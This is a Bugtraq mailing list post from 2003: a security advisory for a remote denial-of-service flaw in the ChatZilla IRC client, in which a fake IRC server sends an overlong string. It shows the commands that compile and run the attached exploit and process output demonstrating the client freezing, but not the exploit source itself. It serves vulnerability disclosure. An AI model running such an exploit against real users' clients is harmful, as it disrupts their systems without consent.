Bugtraq mailing list archives
ChatZilla <=v0.8.23 remote DoS vulnerability
From: d4rkgr3y <grey_1999 () mail ru>
Date: Sun, 14 Sep 2003 10:19:53 +0400
/********************************************************** * * m00 security advistory #003 * * ChatZilla <=v0.8.23 remote DoS vulnerability * * www.m00security.org * ************************************************************/ --------------------------------- Product: ChatZilla Version: 0.8.23 and bellow OffSite: www.mozilla.org --------------------------------- Overview: ChatZilla is a (popular?) linux irc-client. Mozilla/5.0 include it. Problem description: It's possible to freeze system by sending special request with very long string (60kb) to ChatZilla. The vuln could be used by IRC server. Look at the attached exploit source code for more info. Example on localhost: [root@localhost 0dd]# gcc -o m00-ChatZilla m00-ChatZilla.c [root@localhost 0dd]# ./m00-ChatZilla 6667 ChatZilla <=v0.8.23 remote DoS exploit // www.m00security.org [~] Generating evil buf.... OK [+] fake ircd created on port 6667 [+] User connected. Attacking.... OK [root@localhost 0dd]# ps -aux | grep mozilla-bin satan 2128 0.0 12.3 49588 31564 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2118 29.4 12.3 49588 31564 ? R 19:33 0:29 /usr/lib/mozilla-1.3/mozilla-bin <----- satan 2127 0.0 12.3 49588 31564 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2129 0.0 12.3 49588 31564 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2130 0.0 12.3 49588 31564 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2131 0.0 12.3 49588 31564 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin ....after ~10min CPU usage increase up to ~90% on Athlon XP 2000 [root@localhost 0dd]# ps -aux | grep mozilla-bin satan 2128 0.0 12.4 49588 31820 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2118 88.8 12.4 49588 31820 ? R 19:33 10:45 /usr/lib/mozilla-1.3/mozilla-bin <----- satan 2127 0.0 12.4 49588 31820 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2129 0.0 12.4 49588 31820 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2130 0.0 12.4 49588 31820 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin satan 2131 0.0 12.4 49588 31820 ? S 19:33 0:00 /usr/lib/mozilla-1.3/mozilla-bin Exploit attached. (c) m00 Security / d4rkgr3y [d4rk () securitylab ru]
Attachment:
m00-ChatZilla.c
Description:
Current thread:
- ChatZilla <=v0.8.23 remote DoS vulnerability d4rkgr3y (Sep 15)